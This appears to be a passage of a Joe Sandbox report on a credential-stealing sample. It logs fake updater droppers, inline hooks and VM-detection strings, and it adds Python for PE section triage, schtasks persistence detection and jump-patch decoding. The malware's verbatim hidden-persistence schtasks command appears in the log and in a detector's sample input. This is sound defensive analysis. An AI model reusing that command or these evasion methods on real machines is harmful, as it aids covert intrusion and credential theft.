            Source: oobeldr.exe.9.dr | Static PE information: section name: .MPRESS1
            Source: oobeldr.exe.9.dr | Static PE information: section name: .MPRESS2
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D8C245 push esi; ret
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D8CE63 push es; iretd
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D68F27 push es; ret
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D65B83 push ecx; ret
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe | Code function: 7_2_006D50A5 push ebp; ret
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe (copy)
            Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
            Source: C:\Users\user\Desktop\file.exe | File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
            Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exeJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exeJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exeJump to dropped file
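Three of the static findings above come straight from the PE section table: section names with characters no linker emits (".vmp#+", ".vmpY[."), an entry point that sits in ".vmpY[." rather than ".text", and MPRESS sections that are execute+write in the memory dump (".MPRESS1:EW") but execute+read on disk (".MPRESS1:ER"), the usual sign of an in-place unpacker writing decompressed code over its own section. The following Python is an added worked example, not part of this Joe Sandbox report, that pulls those three facts out of a PE header using only the standard library. It runs on a constructed header that mimics the sample's layout: the ".text" section, RVAs and sizes are invented, and the E/R/W letters are my reading of the report's shorthand. To reproduce the "changes PE section rights" finding you would run the same function over the on-disk file and over the dumped image and compare the permission strings.

```python
"""Static triage for the section-level findings in this report: section names
containing non-alphanumeric characters, sections that are both executable and
writable, and an entry point outside the conventional code sections.
The PE bytes built below are a constructed header, not the analysed sample."""
import struct

# IMAGE_SCN_MEM_* bits from winnt.h
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000
SCN_MEM_WRITE = 0x80000000
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}


def perm_string(characteristics):
    """E/R/W shorthand in the style of the report's '.MPRESS1:EW' notation (assumed meaning)."""
    bits = ((SCN_MEM_EXECUTE, "E"), (SCN_MEM_READ, "R"), (SCN_MEM_WRITE, "W"))
    return "".join(letter for bit, letter in bits if characteristics & bit)


def has_special_chars(name):
    """Linker-produced names use letters, digits, '.', '_' or '$'; '.vmp#+' and '.vmpY[.' do not."""
    return not all(c.isalnum() or c in "._$" for c in name)


def parse_pe(data):
    """Return (entry_point_rva, sections) for a PE image; each section is a
    (name, virtual_address, virtual_size, raw_size, characteristics) tuple."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    file_hdr = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, file_hdr + 2)[0]
    opt_size = struct.unpack_from("<H", data, file_hdr + 16)[0]
    opt_hdr = file_hdr + 20
    entry_rva = struct.unpack_from("<I", data, opt_hdr + 16)[0]   # AddressOfEntryPoint
    table = opt_hdr + opt_size                                     # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, raw_size = struct.unpack_from("<III", data, off + 8)
        characteristics = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, va, vsize, raw_size, characteristics))
    return entry_rva, sections


def analyze(data):
    """Summarise the three findings: odd names, W+X sections, entry point location."""
    entry_rva, sections = parse_pe(data)
    report = {"sections": [], "entry_section": None, "entry_outside_standard": True, "exec_and_write": []}
    for name, va, vsize, raw_size, chars in sections:
        report["sections"].append((name, perm_string(chars), has_special_chars(name)))
        if chars & SCN_MEM_EXECUTE and chars & SCN_MEM_WRITE:
            report["exec_and_write"].append(name)
        if va <= entry_rva < va + max(vsize, raw_size):
            report["entry_section"] = name
            report["entry_outside_standard"] = name not in STANDARD_CODE_SECTIONS
    return report


def build_sample_pe(sections, entry_rva):
    """Constructed minimal PE32 header (no code, not loadable) carrying the given section table."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    opt_size = 0xE0                                              # PE32 optional header size
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt_hdr = bytearray(opt_size)
    struct.pack_into("<H", opt_hdr, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt_hdr, 16, entry_rva)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("latin-1"), vsize, va, raw_size, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, raw_size, chars in sections)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt_hdr) + table


# Layout modelled on the report: VMProtect-style names with odd characters, a writable
# code section, resources, and an entry point inside '.vmpY[.' rather than '.text'.
SAMPLE_SECTIONS = [
    (".text",   0x1000, 0x1000, 0x1000, SCN_MEM_EXECUTE | SCN_MEM_READ),
    (".vmp#+",  0x2000, 0x3000, 0x3000, SCN_MEM_EXECUTE | SCN_MEM_READ | SCN_MEM_WRITE),
    (".vmpY[.", 0x5000, 0x1000, 0x1000, SCN_MEM_EXECUTE | SCN_MEM_READ),
    (".rsrc",   0x6000, 0x0800, 0x0800, SCN_MEM_READ),
]
SAMPLE_PE = build_sample_pe(SAMPLE_SECTIONS, entry_rva=0x5010)

if __name__ == "__main__":
    result = analyze(SAMPLE_PE)
    for name, perms, odd in result["sections"]:
        print(f"{name!r:12} {perms:4} {'special chars' if odd else ''}")
    print("entry in", result["entry_section"], "| W+X sections:", result["exec_and_write"])
```

The parser deliberately uses max(VirtualSize, SizeOfRawData) when locating the entry point, because packers routinely leave one of the two at zero.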

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk
Source: C:\Users\user\Desktop\file.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26
Source: C:\Users\user\Desktop\file.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26
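Of the three persistence mechanisms listed (an hourly scheduled task, a Startup-folder .lnk and an HKCU Run value), the schtasks command line is the one a process-creation log captures verbatim, so it is the easiest to alert on. Note that /rl HIGHEST does not grant elevation by itself: the task runs with the highest token the account already has, which for a standard user is still medium integrity. The following Python is an added example, not part of this report, of a detection rule over schtasks command lines. It flags a /create whose task binary lives in a user-writable directory, runs on a high-frequency or logon schedule, requests /rl HIGHEST, or forces overwrite with /f. The first sample line is the report's own; the other two are constructed controls, and the directory list and the two-reason threshold are my choices.

```python
"""Detection logic for schtasks-based persistence, run over process-creation
command lines such as the one logged in this report."""
import ntpath
import shlex

# Directory fragments (lower-case, backslash-delimited) that a normal installer would not
# point a scheduled task at. Chosen for this example; extend to taste.
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")
BEACON_SCHEDULES = {"minute", "hourly", "onlogon", "onstart", "onidle"}
VERBS = {"create", "delete", "change", "run", "end", "query"}


def parse_schtasks(cmdline):
    """Return (verb, options) for a schtasks command line, or None if it is not schtasks.
    Switches without an argument (e.g. /f) map to True; quoted values are unquoted."""
    toks = shlex.split(cmdline, posix=False)   # non-POSIX mode: backslashes stay literal
    if not toks:
        return None
    exe = ntpath.basename(toks[0].strip('"')).lower()
    if exe not in ("schtasks", "schtasks.exe"):
        return None
    verb, opts, i = None, {}, 1
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            if key in VERBS:
                verb = key
            elif i + 1 < len(toks) and not toks[i + 1].startswith("/"):
                opts[key] = toks[i + 1].strip('"')
                i += 1
            else:
                opts[key] = True
        i += 1
    return verb, opts


def analyze_schtasks(cmdline):
    """Score one command line. 'suspicious' needs at least two independent reasons
    (threshold chosen for this example) so a lone /rl HIGHEST does not page anyone."""
    parsed = parse_schtasks(cmdline)
    if parsed is None:
        return None
    verb, opts = parsed
    reasons = []
    if verb == "create":
        target = str(opts.get("tr", "")).lower()
        if any(frag in target for frag in USER_WRITABLE):
            reasons.append("task binary in a user-writable directory")
        if str(opts.get("sc", "")).lower() in BEACON_SCHEDULES:
            reasons.append(f"high-frequency or logon-triggered schedule (/sc {opts['sc']})")
        if str(opts.get("rl", "")).lower() == "highest":
            reasons.append("/rl HIGHEST requested")
        if opts.get("f") is True:
            reasons.append("/f overwrites any existing task of that name")
    return {"verb": verb, "opts": opts, "reasons": reasons, "suspicious": len(reasons) >= 2}


# First line is the one logged in this report; the other two are constructed controls.
SAMPLE_CMDLINES = [
    r'schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST',
    r'schtasks /create /tn "Acme Backup" /tr "C:\Program Files\Acme\backup.exe" /sc DAILY /st 02:00',
    r'cmd.exe /c whoami',
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        verdict = analyze_schtasks(line)
        print("not schtasks" if verdict is None else f"suspicious={verdict['suspicious']} {verdict['reasons']}")
```

The Startup .lnk and the Run value need a different collector (file-creation and registry telemetry respectively); the task name here doubles as a hunting key, since the same 32-hex-character suffix appears in the dropped-file paths and the Run value name.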

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\file.exe | Memory written: PID: 4112 base: 15F0005 value: E9 8B 2F 90 75
Source: C:\Users\user\Desktop\file.exe | Memory written: PID: 4112 base: 76EF2F90 value: E9 7A D0 6F 8A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D57890 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\file.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\file.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
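The two "Memory written" events above are each a 5-byte x86 near jump: opcode E9 followed by a signed little-endian rel32. Decoded, the jump written at 0x76EF2F90 lands at 0x015F000F, and the jump written at 0x015F0005 lands at 0x76EF2F95, exactly five bytes past the first patch. That is the classic inline-hook layout: the entry of a library function is overwritten to divert into a handler, and a trampoline re-executes the five displaced bytes and then jumps back to function+5. PID 4112 is file.exe's own PID (see the "Process Memory Space: file.exe PID: 4112" Yara lines further down), so this is an in-process hook rather than one planted in a foreign process. The following Python is an added worked example, not part of this Joe Sandbox report: the addresses and bytes are the report's, while the pairing rule and the inferred location of the five relocated bytes (0x015F0000) are mine.

```python
"""Decode the two 5-byte writes the sandbox logged for PID 4112 as x86 'JMP rel32'
instructions and pair them up as an inline hook plus its trampoline."""
import struct

# The two "Memory written" events from the report: (address written to, bytes written).
PATCHES = [
    (0x015F0005, bytes.fromhex("E98B2F9075")),
    (0x76EF2F90, bytes.fromhex("E97AD06F8A")),
]


def jmp_rel32_target(address, code):
    """Destination of an E9 <rel32> near jump located at `address` (32-bit address space)."""
    if len(code) != 5 or code[0] != 0xE9:
        raise ValueError("not a 5-byte E9 rel32 jump")
    rel = struct.unpack("<i", code[1:])[0]        # rel32 is signed, little-endian
    return (address + 5 + rel) & 0xFFFFFFFF        # wrap the way a 32-bit process would


def classify_detour(patches):
    """Find (hook, trampoline) pairs: a trampoline's jump lands exactly 5 bytes past the
    address where the other jump was written, i.e. right after the overwritten bytes."""
    targets = {addr: jmp_rel32_target(addr, code) for addr, code in patches}
    pairs = []
    for tramp_addr, tramp_target in targets.items():
        for hook_addr, handler in targets.items():
            if tramp_target == hook_addr + 5:
                pairs.append({
                    "hook_at": hook_addr,              # patched function entry
                    "handler": handler,                # where the hooked function now diverts to
                    "trampoline_jump_at": tramp_addr,  # jump that resumes the original function
                    "resumes_at": tramp_target,        # hook_at + 5, just past the stolen bytes
                    # Inference, not in the report: the 5 relocated original bytes
                    # presumably sit immediately before this jump.
                    "stolen_bytes_at": tramp_addr - 5,
                })
    return pairs


if __name__ == "__main__":
    for addr, code in PATCHES:
        print(f"{addr:08X}: {code.hex(' ').upper()}  -> jmp {jmp_rel32_target(addr, code):08X}")
    for pair in classify_detour(PATCHES):
        print({k: f"{v:08X}" for k, v in pair.items()})
```

The report does not say which export lives at 0x76EF2F90; resolving that needs the module list from the same run, after which the hook target tells you what the stealer intercepts.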

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EFE543 second address: EFE547 instructions: 0x00000000 rdtsc 0x00000002 not cl 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 3658
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 493
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 5011
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe | Window / User API: threadDelayed 9995
Source: C:\Users\user\Desktop\file.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\file.exe | API coverage: 8.9 %
Source: C:\Users\user\Desktop\file.exe TID: 3424 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 1480 | Thread sleep time: -693000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 3424 | Thread sleep time: -3661658s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 1480 | Thread sleep time: -1479000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 3424 | Thread sleep time: -5016011s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 3504 | Thread sleep count: 9995 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 3504 | Thread sleep time: -2248875s >= -30000s
Source: C:\Users\user\Desktop\file.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D2B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D62EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D7CCFD FindFirstFileExW,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D2BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D86276 VirtualQuery,GetSystemInfo,
Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 30000
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: formVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .utiitsl.comVMware20,1169642865
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ccount.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,116x
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CT service, encrypted_token FROM token_servicerr global passwords blocklistVMware20,11696428655
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBn
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696
Source: file.exe, 00000000.00000003.2037044301.00000000016B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .comVMware20,11696428
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,1169642865
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: r global passwords blocklistVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.3698690548.00000000064C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.3698791395.0000000001714000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_D59C8AA1Ee
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: AMC password management pageVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: nickname.utiitsl.comVMware20,1169642865
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.3698791395.0000000001714000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_D59C8AA1
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ra Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696P
Source: file.exe | Binary or memory string: :sqEMu
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: o.inVMware20,11696428655~
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2037044301.00000000016B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000002.4445088347.0000000006456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}gramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsE
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: comVMware20,11696428655o
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rootpagecomVMware20,11696428655o
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000002.4445088347.0000000006430000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: pageformVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}AW.EXE;MMC.EXE;MSHTA.EXE;RUNDLL32.EXE;WINHLP32.EXE;4DX-
Source: file.exe, 00000000.00000002.4443887762.000000000169D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
Source: GNGpmTFam5reWeb Data.0.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000002.4443887762.0000000001699000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: billing_address_id.comVMware20,11696428
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D61780 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D4C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D576E0 GetProcessHeap,HeapFree,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D662B6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D66014 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D6FC07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
